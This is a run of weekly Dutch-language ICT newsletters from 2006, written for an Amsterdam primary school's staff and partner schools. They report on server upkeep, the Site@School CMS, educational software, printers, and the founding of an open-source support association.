Alle scholen reageerden enthousiast op het initiatief. Binnenkort ontvangen de taalcoördinatoren van de Slootermeerschool, ElAmien, Dapperschool, Multatulischool, De Kaap, Amstelmeerschool, Linnaeussschool, Rietlanden, Rosa Boekdrukker, Kruispunt/Santekraam, Merkelbachschool, Corantijn, De Insulinde, De Parelschool, Narcis Querido en De Brink een uitnodiging voor een oriënterende bijeenkomst.

LEERLINGEN VERHUIZEN

We hebben twee nieuwe groepen; 4a en 4b. De leerlingen zijn nog niet naar hun nieuwe groepen verhuisd; geen tijd.

NIEUWE DIRECTEUR

We hebben een nieuwe directeur op de Rosa Boekdrukker. Hij heeft veel verstand van ICT en is al aan het werk om Site@School onder de knie te krijgen. Binnenkort gaat hij zich ook verdiepen in het ICT beleid.

LETTERTYPE VOOR SCHOOL

We kwamen een aardig lettertype tegen met een 'school' a. Zie:
http://home.zonnet.nl/koelooptiemanna/graphics.html
Karin vond 't 'n matig font, maar we willen je de link niet onthouden.

KLOKHUIS

citaat uit een ontvangen email:

"Het Klokhuis is 23 september aanwezig op de Universiteit van Wageningen want daar zitten insectendeskundigen klaar om 100 vragen over insecten te beantwoorden. Heeft er dus iemand van u, of iemand in de klas, ook een vraag over insecten? Mail die dan naar Het Klokhuis en wie weet kan de vragensteller zijn/haar vraagt live beantwoord krijgen."

>>KIJK HIER

Het Klokhuis is van plan om vaker zo'n vragendag te organiseren, bv tijdens de Wetenweek van dit jaar (oktober 2006) Ook dan kunnen er vragen gesteld worden die op een toepasselijke locatie (TNO, dierentuin, TU delft enz) beantwoord zullen worden.

Groet en goed weekend,
Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-09-14 w37

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 37 - 2006 (15 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

We hebben deze week heel erg veel gedaan:
- de leerlingmappen op de server zijn gemigreerd
- de map TEAM is opgeruimd. Daar moeten alle -voor het team- relevante documenten komen te staan. Zoals: zorgformulieren, briefhoofd van de school, adressen teamleden, notulen en noem maar op.
- 4 flatscreens gekocht voor 't kantoor en ook aangeloten. In het BEVO (beeldende vorming) lokaal staat nu ook een computer met flatscreen. Carolina blij. Er komt nu KUNST uit de computer binnenkort.
- wegens ziekte van de conciërge aan de adminstrateur uitgelegd, hoe je de mededelingen op de tv in de hal krijgt.
- data voor verschillende overleggen vastgesteld
- het S@S-FORUM is verplaatst en veranderd (zie hieronder)
- onze tweede scanner staat nu bij de administratie. USB aansluiting. Werkt zo gemakkelijk.
- Klankie toetsenborden in de groepen 3. Volgende week uitproberen.
- We werden gebeld over onze deelname aan de Kennisrotonde "ICT en Klassenmanagement". Volgende week meer hierover.
- Nieuwe agenda van "klokhuis" is binnen. Je kunt je ook aanmelden voor hun nieuwsbrief.

PODCASTEN op WINDOWS 98

Wij wilden ons abonneren op de podcasts van stichting ICTopSchool.
We moesten daartoe van hen iTunes downloaden. Waarom iTunes? Waarom geen OSS/GPL podcaster? Contact met ICTopSchool:

"Hallo Karin,
iTunes werkt niet onder Windows '98. Andere podcast aggregators vereisen ook vaak minimaal Windows XP. Er blijven daarom twee mogelijkheden over om onze podcasts te beluisteren:
- Windows 98 upgraden naar Windows 2000 of XP, waar wel iTunes op werkt
- Abonneren mag dan niet gaan, maar de mp3 bestanden afspelen met een mp3-speler kan wel. Op onze podcast pagina is een lijst te vinden met alle podcast: http://www.ictopschool.net/podcast Klik op een podcast en druk vervolgens op de knop \"beluister de podcast nu direct\".

Hm, dit is wel erg Microsoft en iTunes georiënteerd.
Enig zoeken  leverde op: jPodder, een GPL platform onafhankelijke java podcast aggregator.
Wij installeerden versie 1.1beta probleemloos op één van onze Windows  98 werkstations. Het verwijderen van de vooraf ingestelde zenders vereiste even doorzetten (foutmeldingen, maar gewoon doorgaan!). Komt vast van de betaversie want 1.0 had het niet. Na (eenvoudige) configuratie konden we ons moeiteloos abonneren op de podcasts van ICTopSchool, selecteren welk programma we wilden beluisteren, downloaden en luisteren maar!
Er zijn vele podcast aggregators. Zie bijvoorbeeld (dank Peter!)
http://www.podcastingnews.com/topics/Podcast_Software.html

SITE@SCHOOL FORUM GEMIGREERD

Op de server van de OBSRB draaide nog steeds het forum waar hulp wordt geboden aan aan Site@School gebruikers. De forumsoftware, phpBB2, zorgde voor veel problemen, veiligheidslekken, spammers, russische hackers en allerle onguur volk deed (soms geslaagde) inbraakpogingen. We namen twee besluiten: andere forumsoftware en het forum niet meer op onze server.
We kozen na lange overwegingen het 'Simple Machines Forum (SMF) en installeerden het bij XS4ALL.  Zeer bedankt voor de migratie Fred! We konden meteen een beleidsverandering invoeren. Support is alleen nog gratis voor scholen. Anderen gaan betalen. Zo ziet Fred, die het meeste tijd besteedt aan het beantwoorden van vragen, wat terug van al  zijn inspanningen.

Groet en goed weekend, Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-09-18 w38

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 38 - 2006 (22 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

NOTULEN OP DE ROSA BOEKDRUKKER

Vanaf vandaag zullen we proberen om alle notulen op te slaan in de map "team". Alle leerkrachten hebben toegang tot die map, als ze inloggen met hun eigen gebruikersnaam en wachtwoord.

WIKIKIDS

Kinderen vanaf groep 5 kunnen meedoen aan een eigen encyclopedie. Lees er meer over bij www.wikikids.nl

KLANKIE

Volgende week gaat Karin naar de Klankie training. Klankie is een toetsenbord dat helpt bij het leesproces. Het "praat". We hebben al ontdekt, dat je niet zelf woorden erin kan toevoegen. Jammer.

KLASSENMANAGEMENT EN ICT

Vorig schooljaar hebben we ons aangesloten bij het vraagstuk "klassenmanagement en ICT" bij de Kennisrotonde van ictopschool (nu samengevoegd met kennisnet).
Voor 1 oktober moeten we aangeven of we meegaan met het goedgekeurde projectplan.

VIVES

Het -tot-nu-toe- gratis ICT tijdschrift VIVES staat deze maand weer vol met interessante onderwerpen. o.a. artikelen over het belang van Open Standaarden en Open Source, Klassenmanagement en ICT. Wie nog geen abonnement erop heeft: "je mist wat!!!!"

ANDERE SITES MET S@S GEMAAKT

Neem eens een kijkje op andere sites die met S@S zijn gemaakt. De sites die zich melden staan op deze lijst. Waarschijnlijk is het maar 10% van alle sites in de wereld die ermee gemaakt zijn. Maar desalniettemin een enorme lijst!

SITEATSCHOOL IN JAPAN

Van de zomer werden we bezocht door een professor van het Centre for Language Research van de universiteit van Aizu in Japan. Hij wilde het e.e.a. weten van S@S. Naar aanleiding daarvan schreef hij ons deze week:

"Our department was looking for a content management system to replacea collection of independently created staff web pages. We needed asystem that would allow staff to work collaboratively to produce dynamic evolving and informative web site -- a system that permittedrole assignment, so that various content and editing functions couldbe shared. Another key criterion was that it needed to bestraightforward enough so that staff would be willing to use it.Furthermore, the system needed to facilitate communication and set anexample for other departments and students. After looking for severalmonths, we discovered Site@School. I found it relatively easy toinstall, and when I had problems Fred Stuurman and Dirk Schoutenkindly provided assistance. In July 2006, I visited Rosa BoekdrukkerElementary School, the home of Site@School in Amsterdam, and met withDirk Schouten and Karin Abma. Discussing their system implementationin detail has been helpful in improving our own installation."

Daar zijn we blij mee. We voegden zijn opmerkingen toe aan de pagina waar leerkrachten vertellen over Site@School. Wellicht een kijkje waard:
http://siteatschool.sourceforge.net/index.php?section=1&category=&page=56

_____________________________________________________________

HARDDISK VERVANGEN

Eén van de twee backupdisks in de server vertoonde kuren en meldde dat hij slechte sectoren had. De HD viel nog onder garantie. Disk vervangen: 1 kwartier. Support vanuit Bussum door Peter: idem. Hij en dirk deden 't klusje op woensdagmiddag.

BLACKBOARD KRIJGT PATENT OP E-LEARNING

Zeer lezenswaard en verontrustend: Het amerikaanse bedrijf dat een E-learning systeem op de markt heeft, heeft patent gekregen op allerlei faciliteiten die met e-learning te maken hebben. Stel je het volgende voor:
Als wij in S@S ook maar iets doen met een cursus (pagina maken die door cursisten bezocht kan worden, waarbij ook een forum voor de cursus en een chat), schenden we het Blackboard patent en kunnen voor de rechter gedaagd worden. Dit soort praktijken zijn een steun in de rug van Europese organisaties die tegen softwarepatenten zijn. En, voegen wij hieraan toe, het belang van Open Source Software gelicenseerd onder de General Public License

Groet en goed weekend, Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-09-25 w39

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 39 - 2006 (29 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

KLASSENMANAGEMENT EN ICT

Deze week hebben we ons aangemeld voor het project.  Nu afwachten of we mee kunnen doen, want er is een limiet aan het aantal deelnemers.

VRAGEN VAN COLLEGA'S

Zo tussen geplande werkzaamheden door krijgt de afdeling ICT vragen. Soms worden ze netjes gesteld door de functieknop op onze website: EHB-ICT te gebruiken. Vaak moet Karin haar geplande werk onderbreken. Een greep deze week:

Oplossing: Spreekuur maandag om 15.00 uur en via de knop op de website (ehbict)

KLANKIE TRAINING

Deze week was het zover.
In Woerden vond bij "Station to Station" de Klankie training plaats.
Uit alle winstreken zaten er leerkrachten om te leren omgaan met het Klankie toetsenbord.
Heel leuk en leerzaam.
Ze (station-to-station) gaven zelf grif toe, dat er omissies in het geheel zaten.
Zoals:
er was geen rekening gehouden met MKM woorden
(als je in groep 3 net begint met lezen, zou je graag willen, dat de globaal woorden zouden kunnen worden geoefend, maar dan word je na aanbieding van de letters aa  r  n  k m v  al geconfronteerd met het woord KRAAN. Dat is voor een beginnende lezer toch wel een flinke stap, die in onze leesmethode zo niet voorkomt.

Heel jammer, dat we dan zelf niet onze aanmerkingen verwerkt kunnen zien worden. Dat gevoel wordt zo hevig, omdat iedereen die commentaar heeft op S@S, wèl een antwoord/oplossing op zijn/haar vraag krijgt.
Dan denk je ....grrrr...waarom kan dat nou niet bij educatieve software???? Bij een programma dat ik heb?
Wij zijn gewoon verwend met S@S!!!!
Zo zou het altijd moeten.
Bij de vraag of dit soort tekortkomingen kan worden aangepast was het antwoord: "nee"

ONS ADVIES: BEZINT EER GE AAN KLANKIE BEGINT.

WERKSTATION CAROLINA

Iedereen is jaloers op onze handenarbeid leerkacht Carolina. Ze heeft een werkstation en LCD scherm op haar bureau!

OPEN STANDAARDEN

We kregen van Stichting ICT op School 10 boekjes met DVD; het infopakket 'Open Standaarden'. Het boekje geeft informatie waarop open standaarden zo belangrijk zijn voor het onderwijs. Verder veel tips over te gebruiken software. Dit boekje vinden we een absolute aanrader. Gratis verkrijgbaar bij  Stichting ICTopSchool.
Hartelijk dank, Jeroen en Raoul, voor de boekjes. We zijn op zoek naar de grootste Outlook Express, Word, Frontpage en EXCEL fanaat. Wie meldt zich aan? De winnaar krijgt van ons een boekje!

WERKSTATION STUK?

Om onbekende redenen gaf een werkstation 't op. Nieuwe uit de voorrraad gepakt, nieuw image teruggezet en binnen 10 minuten draaide 't weer in groep 3. Toch wel handig, dat ServerAtSchool.

TEMPLATE OBSRB

We doen een paar kleine veranderingen aan het template. Een sneak preview is te zien op de testsite. Let niet op de kleuren.

FIREWALL

Op de firewall is een poortje opgengezet voor een speciaal programma dat een leerkracht gebruikt t.b.v. een scholing. (een soort ELO).
Het bleek ook dat voip via skype mogelijk is. We onderzoeken nog hoe Skype de firewall weet te passeren.

DOS PROGRAMMA'S

Aan het begin van de zomervakantie schreven we een BIC waarin we meldden, dat we oude dos-programma's hadden. Raoul van ICTopSchool wilde ze graag hebben. Ze zijn inmiddels verstuurd. We zijn benieuwd in welk museum ze komen.

SERVERATSCHOOL op XP

Langzaam vordert het werk aan XP. De eerste tweaks die nodig zijn voor het opzetten van XP op een kaal werkstation zijn geinventariseerd.
XP moet op een kleine fat32 partitie (geen NTFS), maar wel een grotere dan Win98.

Groet en goed weekend, Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-10-02 w40

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 40 - 2006 (6 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

LAATSTE NIEUWS: STRICT OPGERICHT (zie onder)

MAATWERK

Leerlingen verplaatst naar volgende groepen. Beetje laat, maar het was tot nu toe nog niet aan de orde. Meteen de gegevens van een leerling die ermee bezig was geprint. Toen bleek weer, dat onze deskjet de groene letters van het diagnostisch gesprek niet zwart afdrukt. Gelukkig kunnen we ook printen op one kopieermachine. Handig, al die netwerk apparatuur.

KLASSENMANAGEMENT EN ICT

Deze week kregen we bericht dat ons verzoek om mee te doen is gehonoreerd. We gaan meedoen aan het project klassnemanagement en ICT. Een heel leerzame brochure is te lezen hier.
Het projectplan is ook te downloaden.

Website: http://www.ictopschool.net/kennis/vraagstukken/0011

DE KOGEL DOOR DE KERK!!

Een nieuwe directeur - een nieuw beleid.
Het team van onze school krijgt elke zondag om 14.00 uur "DEZE WEEK" gemaild. Daarin staat wat er de komende week te doen is op school op gebied van afspraken en vergaderingen. Op maandagmorgen ligt de papieren versie ook in ons postvakje.
Sinds deze week moeten we zelf de papieren versie printen, als we die nodig hebben. Op ons intranet wordt DEZE WEEK ook gepubliceerd.
De eerste verzoeken om hem toch uit te draaien zijn al in de vergadering gekomen.

De redactie van de BIC juicht deze ontwikkeling van harte toe. Het is papier- en tonerverspilling om DEZE WEEK iedere week weer te printen. De levenscyclus van het document is gewoon te kort.

KLEURENPRINTER OP HOL

Vandaag begon onze kleurenprinter opeens allemaal witte vellen uit te spugen. We zijn er nog niet achter hoe dat kwam. Nu zijn alle printertaken verwijderd.
Printte hij wit, of is de inkt op?

ONDERZOEK

We werden gebeld door een onderzoeksdbureau TNS-NIPO. Ze doen voor stichting kennisnet/Ictopschool een onderzoek naar ICT gebruik in de scholen. Of we 15 minuten tijd hadden om per telefoon de vragen te beantwoorden. "kan het ook via internet?" "nee, alleen per telefoon". "Wat gek, het gaat toch om ICT? Dan ga je toch geen vragen per telefoon stellen??" Bovendien kon het alleen de komende twee weken en niet 's avonds thuis. Jammer dan. Want we hebben nu geen tijd. Gemiste kans voor het onderzoek!

SCHOOLTV BEELDBANK

Grrr! De filmpjes van de beeldbank werken niet meer. We moeten de Windows Media Player wéér upgraden. Kan dat nou niet een keer afgelopen zijn?
We worden dat ge-upgrade zat. Heeft iemand een beter en OSS alternatief  werkend? Het laatste (werkend) is wel belangrijk. We horen het graag. Want er zijn hele leuke filmpjes die je kunt gebruiken voor het beginnend leren lezen.

STRICT OPGERICHT! (foto's)

Na het nemen van vele hobbels (*) is afgelopen donderdag eindelijk de vereniging STRICT (Scholen Tezamen Rijk met ICt) opgericht. We willen jullie het belangrijkste punt uit de statuten niet onthouden; het doel van de vereniging:

1. Het doel van de vereniging is het bevorderen van de continuïteit en het aansturen van de functionaliteit van het Open Source Software serversysteem (gelicentieerd onder de General Public License versie twee) ServerAtSchool.

2. Zij tracht dit doel onder meer te bereiken door (dan volgen wat algemene zaken en vervolgens): - het beheren van een fonds waaruit ontwikkelingskosten van Open Source Software voor scholen bestreden kunnen worden.

Eindelijk kan de vereniging nu daadwerkelijk in actie komen; dat wil zeggen, we kunnen een girorekening hebben waarop gelden van leden kunnen worden geparkeerd en waaruit ontwikkelingskoten aan ServerAtSchool betaald kunnen worden, zoals op dit moment de ontwikkeling van ServerAtSchool op Windows XP. Dat gebeurde tot nu toe via de rekening van onze school. En het fonds kan worden gevuld met bijdragen van scholen die het maken van software in eigen hand gaan nemen. Het lijkt erop dat de eerste school zich al heeft aangediend.

(*) We hebben vele hindernissen moeten nemen. Ziehier een lijstje:
- het ontwikkelen van het idee (ontleend aan de werktuigcoöperaties die in de voor- vorige eeuw, toen de mechanisatie in de landbouw op gang kwam en de kleine boertjes botje bij botje legden om gezamelijk een dorsmachine te kunnen kopen) kostte veel denkkracht.
- Heftige discussies in een Linux groep over de aard van statuten en of doelstellingen ruim of juist strak moeten zijn.
- Het kiezen van een juridische vorm (stichting? Vereniging?, coöperatie? ...?)
- Het overtuigen van de scholen dat een vereniging een goed plan zou zijn.
- Het omvormen van het idee in harde statuten.
- Amendementen, aanvullingen, opmerkingen, tips, suggesties verwerken en communiceren met belanghebbenden.
-    Volmachten verkrijgen van besturen. Dit was een zeer tijdrovend proces. Besturen zeiden toe en haakten weer af.  Een bestuur werkte niet mee terwijl het wel betaalde, etcetera. Eén en ander noodzaakte weer een verandering van de statuten. Pfff, ...
- De gang naar de verkeerde notaris. Deze had geen verstand van Open Source en het gedachtengoed daarachter en verruïneerde onze zorgvuldig geformuleerde doelstellingen. Het kostte wel veel euri's!
- Zoeken van andere notaris via de Koninklijke Notariële Broederschap bracht ons bij 'van Ee & de Jonge' in Utrecht.
- Nieuwe notaris snapt doelstelling en gedachtengoed. Geeft vele nuttige adviezen en de statuten komen (op het gedoe met de besturen na) vlot tot stand.
- Vijf oktober 2006: Ronald, Peter en Dirk gaan naar Utrecht en tekenen de akte. Zie foto
- Na afloop drinken ze koffie op Hoog Catharijne en nemen het eerste besluit: het bestuur vergoedt geen consumpties en dergelijke. Past niet in de doelstelling.

De STRICT leden kunnnen de volledige statuten vinden op de bekende pagina op de bekende site: http://serveropschool.nl

Wie nadere inlichtingen wil over het lidmaatschap: bel met ons, of mail naar info@serveropschool.nl

Groet en goed weekend, Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-10-10 w41

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 41 - 2006 (13 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

MET WOORDEN IN DE WEER

We hebben het MWWidW programma ZARB binnen. Het zijn Word documenten waarmee je toetsen kan maken. Zie www.zarb.nl

PRINTERPROBLEMEN

Op de tweede verdieping loopt de printer steeds vast. Dat ligt niet aan de printer maar aan de gebruikers en/of hun begeleiders. We worden 't een beetje zat en willen de printer maar eens een tijdje buiten bedrijf stellen en de gebruikers op de begane grond laten printen op de copier.

WEBPAGINA VOOR SPORTBUURTWERK

Vorige week kreeg Juriaan, de activiteitenman van Sportbuurtwerk, instructie hoe hij op onze site reclame kan maken voor alle activiteiten die er worden georganiseerd voor de kinderen van onze school, hier in de buurt. We hebben nog niets van zijn hand gezien op onze site. Jammer, want het was wel anderhalf uur ICT tijd.

SCANNER

Collega's: als jullie iets willen scannen is dat een fluitje van een cent. Er zijn twee heel handige scanners op school, die je zo aan de voorkant in je computer kan pluggen. Als je op het linker knopje drukt, begint hij meteen te scannen. Plaatje opslaan en printen. Handig voor als je voor je woordweb een plaatje uit een boek wilt gebruiken!

DYSLEXPERT

We waren ooit geabonneerd op een programma/site "dyslexpert". Omdat we daar niet meer kunnen inloggen leerde een mail naar hen:

Tot onze spijt moeten wij vertellen dat de verdere ontwikkeling van Dyslexpert is stopgezet. Wij betreuren dit erg, maar op dit moment hebben wij onvoldoende middelen ter beschikking om Dyslexpert naar onze maatstaven te ontwikkelen. Dyslexpert is onvoldoende ontwikkeld om het open te stellen voor gebruikers, alleen het statische, vrije deel is te bekijken op www.dyslexpert.nl. U ontvangt dus ook geen gebruikersnaam en wachtwoord. Alle abonnementen zijn al in 2005 stopgezet. Dus u heeft geen abonnement meer op Dyslexpert.

We kwamen hierop, omdat we op school bezig zijn met het leesprotocol in groep 3 en we ons afvroegen of er een handige manier is om de gegevens van de toetsen te registreren. We vonden ook nog op de site van Eduforce dit programma. Heeft iemand hier ervaring mee?

DYSLEXIE

Naar aanleiding van de laatste VIVES zijn we ook op zoek naar meer informatie over "mindmapping".
Op de site van Lexima is veel materiaal te vinden voor dyslexie en daar is ook KIDSPARK te bestellen.
Zijn hier al ervaringen mee?

NIEUWSBRIEF "deze week"

Er zijn voorbereidingen getroffen om dit weekend de wekelijkse mailing (genaamd "deze week") aan de teamleden met onze nieuwsbrieven module te verzenden. Alle emailadressen van de collega's zijn nagelopen. Ze stonden er toch al in voor de BIC. We zijn benieuwd of het Ronald lukt hem met S@S de deur uit te krijgen.

SITEATSCHOOL IN HET NIEUWS

In de VIVES lazen we in de rubriek 'Ingezonden mail':

Graag wil ik iedereen attenderen op de CMS van Site@School. Dit is Open Sourcee software speciaal gemaakt voor het onderwijs. Er zijn verschillende modules ingebouwd om nieuwsbrieven te kunnen versturen; met één druk op de knop de deur uit'. Er zijn opgavenforumulieren beschikbaar, zodat ouders zich online kunnen aanmelden voor allerlei activiteiten. En natuurlijk is er een module fotoalbum aanwezig! Zelfs kan er een pagina voor iedere leerling worden gemaakt die de betreffende leerling zelf kan onderhouden (met eigen gebruikersnaam en wachtwoord). Dit zijn nog maar een paar voorbeelden; Er zitten vele modules in het pakket!
Met vriendelijke groet,
Alex Kikkert, ICT leerkracht van De Wiekslag en De Marke, Tubbergen
Webmaster van: www.demarketubbergen.nl

Redactie BIC: Bedankt Alex!

NETWERKAANSLUITING

De Fa. Hoveling heeft een draadje verlegd voor veel geld en weinig toegevoegde waarde. Maar het ziet er nu wel netter uit bij de administratie: er loopt geen utp-kabel als kerstversiering meer langs het plafond.

SITEATSCHOOL

Het lijkt een beetje stil rond Site@School, maar er is veel aan de gang; zeer technisch, en zeer basaal:
Alle code zit nu in CVS op Sourceforge en is volgens 1 standaard geformatteerd.
Er komt van het weekend een update uit waarin alle beschikbare kennis (tot nu toe) met betrekking tot veiligheid is verwerkt.
Veiligheid heeft top prioriteit en Fred gaat eind van de maand een cursus volgen bij een bedrijf dat gespecialiseerd is in veiligheid. Medewerkers van XS4ALL die met veiligheid te maken hebben worden daar ook geschoold. Aanbeveling?

SERVERATSCHOOL EN XP

Een belangrijke voorwaarde voor het laten werken van XP op ServerAtSchool is gereed. SABRINE is klaar voor XP. SABRINE (Semi Automatic Backup and Restore in a Network Environment) is de software waarmee zelfs een kleuter met twee toetsaanslagen een maagdelijk Windows image kan terugzetten als een computer crasht.

Groet en goed weekend,
Karin
Dirk

p.s. dit is het laatste nummer van jaargang 5!

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-10-17 w42

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 6 - week 42- 2006 (20 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

FEEST OP DE BIC REDAKTIE! We hebben nu 5 jaar lang elke schoolweek deze BIC gemaakt. Dit is het eerste nummer van jaargang 6. De directie deelde champagne uit op de redactie.
HIEPERDEPIEP!!!
Tijd om weer eens de redenen op een rijtje te zetten waarom we wekelijks de BIC uitbrengen. Een historische terugblik.
In eerste instantie was het bedoeld om de andere scholen in ons stadsdeel te laten weten wat we deden. Ons bestuur wilde namelijk een gemeenschappelijk ICT beleid op poten zetten. Door de BIC (Baarsje Informatie en Communicatie) lieten we blijken dat we op ICT gebied de andere scholen ver vooruit waren. Ons bestuur is op een gegeven moment  dan ook gestopt met het bureau dat de ICT samenwerking begeleidde. Het bureau kwam ons om ideeën vragen in plaats van ze te leveren.
We gebruiken deze BIC ook om de teamleden van de Rosa Boekdrukker te informeren en langzamerhand is ons abonnee aantal gegroeid tot 113 lezers. We krijgen uit heel Nederland regelmatig reacties op onderwerpen die in dit medium worden aangesneden. Dat is ook de reden dat we het blijven volhouden om elke week te publiceren.
Tegelijkertijd fungeert het ook als verslag/logboek van onze activiteiten. Ook ontdekten we, dat we met de zoekfunctie in S@S gemakkelijk zaken konden terughalen die zich in het verleden hadden voorgedaan en die we nodig hadden. Dus een soort ICT-op-de-rosaboekdrukker- encyclopedie.

Nu naar de afgelopen week op de Rosa Boekdrukker.

EDUCAT B

De update van Educat b werd gedaan met beheer op afstand. Peter begeleidde Karin met telefoon en het programma VNC (beeldschermbesturing)
Het scheelde Peter erg veel werk. Hij hoefde niet vanuit Bussum te komen. En het scheelt daardoor ons ook in de portemonnee. Kortom, het beheer wordt steeds efficiënter.
De funtie van on-line de database van Educat raadplegen doet het nu. Ook zijn de bibliotheek moeders deze week begonnen met het uitlenen via de computer. Weg met de kaartjes uit de boeken!

PROJECT KLASSENMANAGEMENT EN ICT

Er is een afspraak gemaakt met onze klassencoach van klassewijzer voor een intake gesprek om het project Klassenmanagement en ICT te starten. Het is pas in november. We zijn erg benieuwd!

BEELDBANK

We hebben de beeldbank getemd! De filmpjes werken nu prima in zowel Internet Explorer als in firefox. We gebruiken nog steeds Windows Media Player Versie 7. Dat kan dus prima. Beeldbank zegt dat de filmpjes niet werken met WMP < versie 9. Niet waar dus.  Vooor geinteresseerden hebben we de handleiding en de benodigde codecs en plugin.

TEMPLATE NIEUWSBRIEVEN

De 'Deze Week'  (interne nieuwsbrief voor leerkrachten) verscheen al niet meer op papier, maar via de nieuwsbrieven module in Site@School. De opmaak was nog niet zo goed omdat de  DW in Word door Ronald thuis gemaakt werd en daarna geïmporteerd.
In Site@School kun je heel makkelijk templates maken, en dat deden we. De  DW moet er nu goed uitzien.

SITE@SCHOOL

Nu de versie 2.4.10 is uitgebracht (UPGRADEN dames en heren S@S gebruikers) is het even rustig aan het S@S front. Behalve de veiligheid willen we nog een hot issue onder handen nemen: testen. Het testen van S@S moet beter. Je merkt dat we geen professionele testers zijn. Wie helpt ons? Met ideeën, kontacten, suggesties voor benaderingen, etc.

SERVERATSCHOOL

Het werk vordert gestaag. Het is nu mogelijk een XP image te maken (uploaden) en weer terug te zetten op een werkstation. XP blijft een moeilijk systeem in termen van beheer en veiligheid; de problemen die spelen zijn wel zo ongeveer door Peter in kaart gebracht.

TE KOOP TE KOOP TE KOOP TE KOOP TE KOOP

Wegens overcompleet: Een NETGEAR switch, type FS526T. Hij heeft twee Gigabit poorten en 24 10/100 Mb poorten, 1 jaar oud, in staat van nieuw, prijs E 95,--. Mail of bel.

Groet en een goede herfstvakantie. Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-10-18 w42

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 6 - week 44 - 2006 (3 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

⇔⇒⇒⇒⇔⇒⇒⇒⇔⇒⇒⇒⇔⇒⇒⇒⇔⇒⇒⇒⇔⇒⇒⇒⇔⇒⇒⇒⇔⇒⇒

Groet en een goed weekend,
Karin
Dirk

### bijdrage: Dirk Schouten : schoutdi@knoware.nl ###
Dennis vroeg: Mag ik jullie vragen hoe jullie dit hebben ingeregeld? Hebben jullie handsets die jullie gebruiken of met koptelefoon/microfoon via de pc? Welk programma gebruiken jullie? Skype? MSN? (Nét echt!!!Hahaha!) Kunnen jullie ook naar 'buiten' bellen? Hoe is dit dan geregeld? En zijn er nog abonnementskosten (ISP, programma, etc)? Nog andere zaken die ik vergeet? Bij ons op school al jaren gezeur om telefoons in elke klas + centrale maar zoals altijd: geen geld... VOIP is natuurlijk buitenkansje! ### bijdrage: Dirk Schouten : schoutdi@knoware.nl ###

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-11-02 w44

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 40 - 2006 (6 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

MALMBERG

We ontvangen nog steeds betalingsherinneringen voor het programma Letterpret. Deze week is er een schrijven naar hen de deur uitgegaan vergezeld van een heel dik pak gekopieerde correspondentie met de mededeling, dat we niet zullen betalen.
We zijn benieuwd.

PAGINA MET SITES VOOR KINDEREN

Deze week weer eens een poging gedaan om geschikte sites (kijk hier) voor kinderen te verzamelen. Van die leerzame sites. Maar altijd zitten er weer spelletjes op en kleurplaten. Waar zit toch de grens tussen spelen en leren? Natuurlijk vinden kinderen spelletjes het leukst. Snoepen doen ze ook heel graag.
Zijn er collega's met leuke leerzame suggesties voor sites? We houden ons aanbevolen.

NIEUWSBRIEVEN

Deze week weer druk bezig geweest met de nieuwsbrievenmodule. Waarom worden de plaatjes niet verzonden? Dat probleem is opgelost, maar nu wijst onze beheerder erop, dat het gevaarlijk is om plaatjes in mails te zetten. En ook om mails met plaatjes erin te ontvangen, want er kan "achter" een afbeelding allerlei slechts (virussen)  worden gestopt. Oplossing: stuur een nieuwsbrief via de nieuwsbrievenmodule met een link naar een PDF op de site. Dat wordt ook door een andere school die met S@S werkt gedaan.
We zullen het proberen.
Dan kunnen ouders zich toch nog aanmelden voor onze nieuwsbrief via de knop "aanmelden" op de site.

WINDOWS MEDIA PLAYER

Het blijkt dat de filmpjes in 'Huisje Boompje Beestje'  het alleen doen onder Windows Media Player versie 9. Dus toch maar de upgrade gedaan. HBB werkt (nog) niet onder Firefox. Klusje voor volgende week.

Groet en een goed weekend, Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-11-08 w45

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 45 - 2006 (10 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ALLES TELT

